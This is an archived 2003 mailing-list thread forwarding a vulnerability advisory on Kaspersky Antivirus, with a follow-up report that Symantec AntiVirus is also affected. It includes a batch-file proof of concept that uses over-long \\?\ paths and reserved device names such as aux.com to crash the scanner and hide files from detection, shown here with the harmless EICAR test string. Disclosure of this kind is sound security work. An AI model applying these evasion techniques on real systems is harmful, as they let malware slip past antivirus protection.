FW: Re[2]: SECURITY.NNOV: Kaspersky Antivirus DoS

2003-02-15T00:00:00
ID SECURITYVULNS:DOC:4081
Type securityvulns
Reporter Securityvulns
Modified 2003-02-15T00:00:00

Description

Dear Symantec -

I will rely on the Bugtraq moderator to help steer this process appropriately in the public forum (delay post, etc) since I am inexperienced in these matters.

There appears to possibly be three DoS vulnerabilities in at least one Symantec AntiVirus product. Initial report from Zaraza indicated problems in Kaspersky AV, but the problem also appears to affect Symantec AV CE 8.00.9374 on Win2K Server SP3.

I cannot do thorough testing, but I believe I've confirmed the results on my PC twice. I'm not a security researcher, so someone else needs to look at the potential problem to confirm this.

I've been asked by a Zaraza to post this to bugtraq. I wanted to let Symantec know first if possible, but I am posting to Bugtraq simultaneously because if I found this based on Zaraza's work, others must surely already be aware of it (if the problem is genuine). There has been no independent confirmation of my results by any qualified security researcher as far as I know.

  • Jim

3APA3A> Dear James C Slora Jr,

3APA3A> It could be nice if you send a copy of this message to bugtraq.

3APA3A> --Tuesday, February 11, 2003, 9:24:27 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

JCSJ> Privet, zaraza

JCSJ> 1, 2 and 3 seem to apply to Symantec AntiVirus 8.00.9374 as well. I'd rather JCSJ> let someone more qualified and respected (such as yourself) check this out JCSJ> before posting to Bugtraq, though.

JCSJ> after exploit for 1 and 2, SAV user interface runs OK, but both realtime and JCSJ> manual scanning silently fail. Exploit for 3 appears to give the same result JCSJ> as your Kaspersky tests. I tried 3 first, then 1-2.

JCSJ> - Jim

JCSJ> -----Original Message----- JCSJ> From: 3APA3A [mailto:3APA3A@SECURITY.NNOV.RU] JCSJ> Sent: Tuesday, February 11, 2003 05:10 JCSJ> To: bugtraq@SECURITY.NNOV.RU; bugtraq@securityfocus.com JCSJ> Subject: SECURITY.NNOV: Kaspersky Antivirus DoS

JCSJ> Title: Kaspersky Antivirus DoS JCSJ> Affected: Kaspersky Antivirus 4.0.9.0 JCSJ> (Server and Workstation version on JCSJ> Windows NT 4.0 and Windows 2000). JCSJ> Author: ZARAZA <3APA3A@SECURITY.NNOV.RU> JCSJ> Vendor: Kaspersky Lab JCSJ> Date: January, 30 2003 JCSJ> Risk: Average JCSJ> Exploitable: Yes JCSJ> Remote: Yes (for server versions) JCSJ> Vendor Notified: January, 30 2003

JCSJ> I. Introduction:

JCSJ> Kaspersky Antivirus (KAV) is a family of antiviral products.

JCSJ> II. Vulnerability:

JCSJ> Few vulnerabilities were identified. Most serious allows user to crash JCSJ> antiviral server remotely (write access to any directory on remote JCSJ> server is required).

JCSJ> 1. Long path crash JCSJ> 2. Long path prevents malware from detection JCSJ> 3. Special name prevents malware from detection

JCSJ> III. Details:

JCSJ> 1. Long path crash

JCSJ> NTFS file system allows to create paths of almost unlimited length. But JCSJ> Windows API does not allow path longer than 256 bytes. To prevent JCSJ> Windows API from checking requested path \\?\ prefix may be used to JCSJ> filename. This is documented feature of Windows API. Paths longer than JCSJ> 256 characters will cause KAV monitor service to crash or hang with 100% JCSJ> CPU usage. Possibility of code execution is not researched.

JCSJ> 2. Long path prevents malware from detection

JCSJ> Long path will also prevent malware from detection by antiviral scanner.

JCSJ> 3. Special name prevents malware from detection

JCSJ> It's possible to create NTFS file with name like aux.vbs or aux.com. JCSJ> Malware in this file will not be detected.

JCSJ> IV. Exploit:

JCSJ> This .bat file demonstrates vulnerability.

JCSJ> 1,2 Long path crash & Long path prevents malware from detection

JCSJ> @echo off JCSJ> SET JCSJ> A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA JCSJ> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA JCSJ> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA JCSJ> mkdir \\?\c:\%A% JCSJ> mkdir \\?\c:\%A%\%A% JCSJ> mkdir \\?\c:\%A%\%A%\%A% JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A% JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A%\%A% JCSJ> mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A% JCSJ> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

JCSJ> 3. Special name prevents malware from detection

JCSJ> echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >>\\?\c:\aux.com

JCSJ> V. Vendor

JCSJ> No response from vendor.

JCSJ> -- JCSJ> http://www.security.nnov.ru JCSJ> /\_/\ JCSJ> { , . } |\ JCSJ> +--oQQo->{ ^ }<-----+ \ JCSJ> | ZARAZA U 3APA3A } JCSJ> +-------------o66o--+ / JCSJ> |/ JCSJ> You know my name - look up my number (The Beatles)